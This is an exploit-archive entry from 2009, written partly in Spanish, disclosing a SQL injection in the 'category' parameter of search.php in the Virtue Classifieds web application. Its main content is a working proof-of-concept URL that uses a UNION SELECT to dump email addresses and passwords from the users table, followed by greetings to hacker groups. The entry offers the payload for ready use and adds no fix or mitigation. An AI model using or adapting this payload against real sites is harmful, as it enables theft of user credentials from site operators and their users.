[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Virtue Classifieds (category) SQL Injection Vulnerability
# Published : 2009-06-08
# Author : OzX
# Previous Title : Joomla Component com_school 1.4 (classid) SQL Injection Vulnerability
# Next Title : Virtue Book Store (cid) Remote SQL Injection Vulnerability


#################################################################################################################################################

CMS : Virtue Classifieds
WEB : http://www.virtuenetz.com/classified/
Archivo : search.php
Variable Tipo : GET
Valor : category
Tipo : SQL Injection
Url : http:/www.site.com/search.php?category=[SQLI]

PoC:

http:/www.site.com/search.php?category=2+and+1=0+union+select+all+1,2,concat_ws(0x3A,email,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.

100% CHILE
WWW.UNDERSECURITY.NET

##################################################################################################################################################

# www.Syue.com [2009-06-08]